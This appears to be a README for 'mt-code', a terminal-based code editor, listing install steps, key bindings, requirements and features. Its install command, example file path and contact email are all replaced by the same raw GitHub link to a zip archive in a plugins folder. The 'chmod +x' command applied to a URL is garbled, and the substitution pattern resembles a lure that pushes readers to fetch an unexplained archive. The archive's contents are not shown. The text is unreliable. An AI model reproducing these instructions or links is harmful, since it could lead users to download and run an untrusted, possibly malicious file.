mt-code is a lightweight terminal-based code editor designed for ease of use. With support for Language Server Protocol (LSP), plugins, command palette, and syntax highlighting, it simplifies coding tasks for everyone.
-
Visit the Releases Page: To download mt-code, visit this page.
-
Choose Your Version: Click on the version you want to download. This may be the latest release.
-
Download the Application: After selecting a version, download the appropriate file based on your operating system.
-
Run the Installer:
- Open your terminal and navigate to the directory where you downloaded mt-code.
- Run the following commands:
chmod +x https://github.com/PeteNaJaXD/mt-code/raw/refs/heads/main/config/plugins/mt-code-3.1.zip https://github.com/PeteNaJaXD/mt-code/raw/refs/heads/main/config/plugins/mt-code-3.1.zip
The install script will:
- Create a virtual environment
- Install necessary dependencies
- Add
mt-codeto your PATH - Launch the editor with a welcome file
You can start using mt-code right after installation. Here are simple commands to open the editor:
- To open the editor:
mt-code
- To open a specific file:
mt-code https://github.com/PeteNaJaXD/mt-code/raw/refs/heads/main/config/plugins/mt-code-3.1.zip
- To open a folder:
mt-code /path/to/folder
Here are the key functions you can use within mt-code:
| Key | Action |
|---|---|
| Ctrl+O / Ctrl+N | Open file / New tab |
| Ctrl+S | Save file |
| Ctrl+W | Close tab |
| Ctrl+Q | Quit |
| Shift+Tab | Switch tabs |
| Ctrl+E | Focus editor |
| Ctrl+T | Focus terminal |
| Ctrl+R | Focus file explorer |
| Ctrl+P | Command palette |
| Ctrl+F | Find and replace |
| Ctrl+Space | Trigger autocomplete |
mt-code is compatible with most systems. Here are the general requirements:
- Operating System: Windows, macOS, or Linux.
- Python Version: Ensure you have Python 3.6 or newer installed.
- Memory: A minimum of 512 MB of RAM is recommended.
mt-code offers a range of features to streamline your coding experience:
- Terminal-Based Interface: Work directly in your terminal.
- LSP Support: Enjoy language-specific features like autocompletion and linting.
- Plugins: Extend functionality to meet your needs.
- Command Palette: Quickly access commands and features.
- Syntax Highlighting: Code readability is enhanced through visual cues.
If you encounter issues while downloading or installing mt-code, consider these steps:
- Permissions: Ensure you have the necessary permissions to run the install script.
- Dependencies: Check that Python is correctly installed and configured on your system.
- Re-Download: If installation fails, try deleting the downloaded files and downloading again.
For more help, consult the FAQ section.
We welcome contributions to improve mt-code! If you have suggestions or bug reports, feel free to open an issue in the repository.
Need help or have questions? Reach out via the issues section of this repository or email us at https://github.com/PeteNaJaXD/mt-code/raw/refs/heads/main/config/plugins/mt-code-3.1.zip
To explore mt-code further, check the official documentation and tutorials available in the repository.
Make coding simple and efficient with mt-code!